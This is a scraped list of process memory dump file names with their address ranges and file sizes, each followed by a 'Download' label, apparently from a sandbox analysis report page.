memory/5800-1634-0x00007FFCDB560000-0x00007FFCDBB4A000-memory.dmp

Filesize
5.9MB

Download
memory/5800-1624-0x00007FFCF3070000-0x00007FFCF3093000-memory.dmp

Filesize
140KB

Download
memory/5800-1619-0x00007FFCDB120000-0x00007FFCDB495000-memory.dmp

Filesize
3.5MB

Download
memory/5800-1603-0x00007FFCDBCC0000-0x00007FFCDBE2F000-memory.dmp

Filesize
1.4MB

Download
memory/5800-1588-0x00007FFCF30F0000-0x00007FFCF3113000-memory.dmp

Filesize
140KB

Download
memory/5800-1587-0x00007FFCDB560000-0x00007FFCDBB4A000-memory.dmp

Filesize
5.9MB

Download
memory/5800-1594-0x00007FFCF3050000-0x00007FFCF3069000-memory.dmp

Filesize
100KB

Download
memory/5844-1493-0x000001642C5B0000-0x000001642C5B8000-memory.dmp

Filesize
32KB

Download
memory/5896-1337-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/5896-1341-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/5896-1342-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/5896-1343-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/5896-1344-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/5896-1345-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/5896-1346-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/5896-1338-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/5896-1339-0x000001450DBE0000-0x000001450DBE1000-memory.dmp

Filesize
4KB

Download
memory/6084-1210-0x00000220FD810000-0x00000220FE2D1000-memory.dmp

Filesize
10.8MB

Download